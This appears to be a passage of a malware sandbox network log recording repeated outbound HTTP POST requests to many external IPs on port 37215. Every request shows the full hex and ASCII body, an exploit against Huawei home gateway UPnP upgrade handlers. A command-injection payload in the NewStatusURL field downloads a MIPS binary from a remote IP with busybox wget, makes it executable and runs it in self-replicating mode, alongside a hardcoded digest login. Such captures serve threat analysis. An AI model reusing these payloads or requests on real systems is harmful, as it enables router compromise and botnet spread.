                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        646192.168.2.235062490.5.216.19337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.494503975 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        647192.168.2.2357084197.236.218.13937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.494508028 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        648192.168.2.2360156197.51.8.6837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.494529963 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        649192.168.2.2341370157.249.27.12637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.494549990 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        650192.168.2.234753261.36.50.4637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.494596004 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        651192.168.2.2359992197.224.95.8037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.494616032 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        652192.168.2.234236641.209.168.237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.494677067 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        653192.168.2.233341075.130.156.9437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.494684935 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        654192.168.2.2335462197.171.82.6337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.494713068 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        655192.168.2.2333812157.218.166.22637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.494767904 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
